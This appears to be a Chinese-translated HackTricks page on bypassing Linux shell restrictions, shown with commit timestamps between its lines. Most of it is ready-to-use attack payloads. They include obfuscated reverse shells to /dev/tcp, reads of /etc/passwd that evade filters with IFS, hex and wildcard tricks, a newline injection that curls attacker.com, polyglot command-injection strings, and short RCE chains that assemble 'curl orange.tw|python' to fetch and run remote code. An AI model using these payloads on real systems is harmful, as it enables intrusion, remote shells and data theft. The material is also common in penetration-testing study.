2023-08-23 12:47:23 +00:00
# 绕过Linux限制
2022-04-28 16:01:33 +00:00
< details >
2024-02-08 22:20:49 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2023-12-31 00:18:07 +00:00
支持HackTricks的其他方式:
2024-02-08 22:20:49 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
2024-03-29 21:06:45 +00:00
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**。**
2024-02-08 22:20:49 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-03-29 21:06:45 +00:00
< figure > < img src = "../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-06-06 22:28:05 +00:00
2023-01-01 16:19:07 +00:00
\
2024-03-17 16:19:28 +00:00
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)轻松构建和**自动化工作流程**,利用世界上**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-06-06 22:28:05 +00:00
2023-01-01 16:19:07 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2022-06-06 22:28:05 +00:00
2023-08-03 19:12:22 +00:00
## 常见限制绕过
2021-02-17 12:02:24 +00:00
2023-08-03 19:12:22 +00:00
### 反向Shell
2021-02-17 12:02:24 +00:00
```bash
2021-02-16 22:44:45 +00:00
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
2021-02-16 23:15:57 +00:00
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>& 1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
2023-05-15 07:32:59 +00:00
# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
2021-02-16 22:44:45 +00:00
```
2024-03-29 21:06:45 +00:00
### 短反弹 shell
2021-03-30 00:10:09 +00:00
```bash
2021-03-30 08:00:11 +00:00
#Trick from Dikline
2021-03-30 00:10:09 +00:00
#Get a rev shell with
(sh)0>/dev/tcp/10.10.10.10/443
#Then get the out of the rev shell executing inside of it:
exec >& 0
```
2024-03-29 21:06:45 +00:00
### 绕过路径和禁用词
2021-02-17 12:02:24 +00:00
```bash
2021-02-16 22:44:45 +00:00
# Question mark binary substitution
/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
# Wildcard(*) binary substitution
/usr/bin/who*mi # /usr/bin/whoami
# Wildcard + local directory arguments
touch -- -la # -- stops processing options after the --
ls *
2022-11-27 17:38:19 +00:00
echo * #List current files and folders with echo and wildcard
2021-02-16 22:44:45 +00:00
# [chars]
/usr/bin/n[c] # /usr/bin/nc
2022-10-02 22:00:14 +00:00
# Quotes
2021-02-16 22:44:45 +00:00
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64
2022-10-02 22:00:14 +00:00
#Backslashes
\u\n\a\m\e \-\a # uname -a
2021-04-12 09:10:24 +00:00
/\b\i\n/////s\h
2022-10-02 22:00:14 +00:00
# $@
who$@ami #whoami
# Transformations (case, reverse, base64)
$(tr "[A-Z]" "[a-z]"<<< "WhOaMi") #whoami -> Upper case to lower case
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
$(rev<<< 'imaohw') #whoami
bash<<< $(base64 -d<< < Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw ==) #base64
2021-04-20 07:42:08 +00:00
# Execution through $0
2021-04-12 09:10:24 +00:00
echo whoami|$0
2021-02-16 22:44:45 +00:00
# Uninitialized variables: A uninitialized variable equals to null (nothing)
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
# Fake commands
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
# Concatenation of strings using history
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
mi # This will throw an error
whoa # This will throw an error
!-1!-2 # This will execute whoami
2020-07-15 15:43:14 +00:00
```
2024-03-17 16:19:28 +00:00
### 绕过禁止空格
2021-02-17 12:02:24 +00:00
```bash
2021-02-16 22:44:45 +00:00
# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test
2020-07-15 15:43:14 +00:00
2022-05-01 12:41:36 +00:00
# IFS - Internal field separator, change " " for any other character ("]" in this case)
2021-02-16 22:44:45 +00:00
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd
2020-07-15 15:43:14 +00:00
2021-02-16 22:44:45 +00:00
# Put the command line in a variable and then execute it
2020-07-15 15:43:14 +00:00
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
2021-02-16 22:44:45 +00:00
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
IFS=,;`cat< < < cat , / etc / passwd ` # Using cat twice
# Other way, just change each space for ${IFS}
2020-07-15 15:43:14 +00:00
echo${IFS}test
2021-02-16 22:44:45 +00:00
# Using hex format
2020-07-15 15:43:14 +00:00
X=$'cat\x20/etc/passwd'&& $X
2022-10-02 21:44:11 +00:00
# Using tabs
echo "ls\x09-l" | bash
2021-02-16 22:44:45 +00:00
# New lines
2020-07-15 15:43:14 +00:00
p\
i\
n\
2021-02-23 21:39:56 +00:00
g # These 4 lines will equal to ping
2020-07-15 15:43:14 +00:00
2022-05-01 12:41:36 +00:00
# Undefined variables and !
2021-02-16 22:44:45 +00:00
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
uname!-1\-a # This equals to uname -a
2020-07-15 15:43:14 +00:00
```
2023-12-31 00:18:07 +00:00
### 绕过反斜杠和斜杠
2021-04-12 09:10:24 +00:00
```bash
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
```
2023-12-31 00:18:07 +00:00
### 绕过管道
2022-10-02 22:00:14 +00:00
```bash
bash< < < $(base64 -d< < < Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw = = )
```
2024-01-10 06:29:36 +00:00
### 通过十六进制编码绕过
2021-04-12 09:10:24 +00:00
```bash
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat `xxd -r -p <<< 2f6574632f706173737764`
xxd -r -ps < (echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
```
2024-02-08 22:20:49 +00:00
### 绕过IP限制
2021-02-17 12:02:24 +00:00
```bash
2021-02-16 22:44:45 +00:00
# Decimal IPs
2020-07-15 15:43:14 +00:00
127.0.0.1 == 2130706433
```
2024-03-17 16:19:28 +00:00
### 基于时间的数据泄露
2021-04-12 09:10:24 +00:00
```bash
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
```
2024-02-08 22:20:49 +00:00
### 从环境变量中获取字符
2024-03-29 21:06:45 +00:00
在某些情况下,您可能无法直接执行命令或访问文件,但可以访问环境变量。您可以使用以下命令从环境变量中提取字符:
2024-02-08 22:20:49 +00:00
2024-03-17 16:19:28 +00:00
```bash
2024-03-29 21:06:45 +00:00
echo ${PATH:0:1}
2024-03-17 16:19:28 +00:00
```
2024-03-29 21:06:45 +00:00
这将输出环境变量`PATH`的第一个字符。您可以更改`0`和`1`的值来提取不同位置的字符。
2023-08-03 19:12:22 +00:00
```bash
echo ${LS_COLORS:10:1} #;
echo ${PATH:0:1} #/
```
2024-02-08 22:20:49 +00:00
### DNS数据泄露
2021-04-12 09:10:24 +00:00
2024-02-08 22:20:49 +00:00
您可以使用**burpcollab**或[**pingb**](http://pingb.in) 作为示例。
2022-07-01 18:11:43 +00:00
2023-12-31 00:18:07 +00:00
### 内建命令
2022-07-01 18:11:43 +00:00
2024-03-29 21:06:45 +00:00
如果您无法执行外部函数,只能访问**有限的内建函数来获得RCE**,那么有一些巧妙的技巧可以做到。通常您**无法使用所有**的**内建函数**,因此您应该**了解所有选项**以尝试绕过监狱。灵感来自[**devploit**](https://twitter.com/devploit)。\
2024-02-08 22:20:49 +00:00
首先检查所有的[**shell内建命令**](https://www.gnu.org/software/bash/manual/html\_node/Shell-Builtin-Commands.html)**。** 然后这里有一些**建议**:
2022-07-01 18:11:43 +00:00
```bash
# Get list of builtins
declare builtins
# In these cases PATH won't be set, so you can try to set it
2022-07-01 18:22:24 +00:00
PATH="/bin" /bin/ls
2022-07-01 18:11:43 +00:00
export PATH="/bin"
declare PATH="/bin"
2022-07-01 18:22:24 +00:00
SHELL=/bin/bash
2022-07-01 18:11:43 +00:00
# Hex
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
# Input
read aaa; exec $aaa #Read more commands to execute and execute them
read aaa; eval $aaa
# Get "/" char using printf and env vars
printf %.1s "$PWD"
## Execute /bin/ls
$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
## To get several letters you can use a combination of printf and
declare
declare functions
declare historywords
# Read flag in current dir
source f*
flag.txt:1: command not found: CTF{asdasdasd}
2022-11-05 10:10:42 +00:00
# Read file with read
while read -r line; do echo $line; done < /etc/passwd
2022-07-01 18:11:43 +00:00
# Get env variables
declare
# Get history
history
declare history
declare historywords
2023-04-05 23:11:20 +00:00
# Disable special builtins chars so you can abuse them as scripts
[ #[: ']' expected
## Disable "[" as builtin and enable it as script
enable -n [
echo -e '#!/bin/bash\necho "hello!"' > /tmp/[
chmod +x [
export PATH=/tmp:$PATH
if [ "a" ]; then echo 1; fi # Will print hello!
2022-07-01 18:11:43 +00:00
```
2023-08-03 19:12:22 +00:00
### 多语言命令注入
2021-04-12 09:10:24 +00:00
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
```
2023-12-31 00:18:07 +00:00
### 绕过潜在的正则表达式
2022-06-23 12:12:25 +00:00
```bash
2023-01-02 01:09:24 +00:00
# A regex that only allow letters and numbers might be vulnerable to new line characters
2022-06-23 12:12:25 +00:00
1%0a`curl http://attacker.com`
```
2023-12-31 00:18:07 +00:00
### Bashfuscator
2024-02-08 22:20:49 +00:00
### Bash混淆器
2022-10-02 22:00:14 +00:00
```bash
# From https://github.com/Bashfuscator/Bashfuscator
./bashfuscator -c 'cat /etc/passwd'
```
2023-12-31 00:18:07 +00:00
### 五个字符的RCE
2022-06-23 12:12:25 +00:00
```bash
# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
#Oragnge Tsai solution
## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_
## Step2: generate `curl orange.tw|python` to file "g"
## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _
# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file
## Finally execute the file "g"
http://host/?cmd=sh g
# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
## Execute tar command over a folder
http://52.199.204.34/?cmd=>tar
http://52.199.204.34/?cmd=>zcf
http://52.199.204.34/?cmd=>zzz
http://52.199.204.34/?cmd=*%20/h*
# Another curiosity if you can read files of the current folder
ln /f*
2023-08-03 19:12:22 +00:00
## If there is a file /flag.txt that will create a hard link
2022-06-23 12:12:25 +00:00
## to it in the current folder
```
2024-03-29 21:06:45 +00:00
### 用4个字符进行RCE
2022-06-23 12:12:25 +00:00
```bash
# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
# it will follow the same principle of creating the command `ls -t>g` in a file
# and then generate the full command in filenames
# generate "g> ht- sl" to file "v"
'>dir'
'>sl'
'>g\>'
'>ht-'
'*>v'
# reverse file "v" to file "x", content "ls -th >g"
'>rev'
'*v>x'
# generate "curl orange.tw|python;"
'>\;\\'
'>on\\'
'>th\\'
'>py\\'
'>\|\\'
'>tw\\'
'>e.\\'
'>ng\\'
'>ra\\'
'>o\\'
'>\ \\'
'>rl\\'
'>cu\\'
# got shell
'sh x'
'sh g'
```
2024-02-08 22:20:49 +00:00
## 只读/Noexec/Distroless绕过
2022-06-23 12:12:25 +00:00
2024-03-29 21:06:45 +00:00
如果你在一个具有**只读和noexec保护**甚至在一个distroless容器中, 仍然有方法可以**执行任意二进制文件, 甚至是一个shell! :**
2022-05-07 13:38:40 +00:00
2023-08-23 12:47:23 +00:00
{% content-ref url="../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/" %}
[bypass-fs-protections-read-only-no-exec-distroless ](../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ )
2022-05-07 13:38:40 +00:00
{% endcontent-ref %}
2023-08-03 19:12:22 +00:00
## Chroot和其他监狱绕过
2023-04-02 23:36:35 +00:00
{% content-ref url="../privilege-escalation/escaping-from-limited-bash.md" %}
[escaping-from-limited-bash.md ](../privilege-escalation/escaping-from-limited-bash.md )
{% endcontent-ref %}
2024-02-08 22:20:49 +00:00
## 参考资料和更多
2020-07-15 15:43:14 +00:00
2022-06-06 22:28:05 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits )
* [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet ](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet )
* [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 ](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 )
* [https://www.secjuice.com/web-application-firewall-waf-evasion/ ](https://www.secjuice.com/web-application-firewall-waf-evasion/ )
2021-02-17 12:02:24 +00:00
2024-03-29 21:06:45 +00:00
< figure > < img src = "../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2021-02-17 12:02:24 +00:00
2023-01-01 16:19:07 +00:00
\
2024-02-08 22:20:49 +00:00
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)轻松构建和**自动化工作流程**,由全球**最先进**的社区工具驱动。\
立即获取访问权限:
2020-07-15 15:43:14 +00:00
2023-01-01 16:19:07 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
< details >
2024-03-29 21:06:45 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-12-31 00:18:07 +00:00
2024-02-08 22:20:49 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-03-29 21:06:45 +00:00
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
2024-02-08 22:20:49 +00:00
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
2024-03-29 21:06:45 +00:00
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或在**Twitter**上关注我们 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >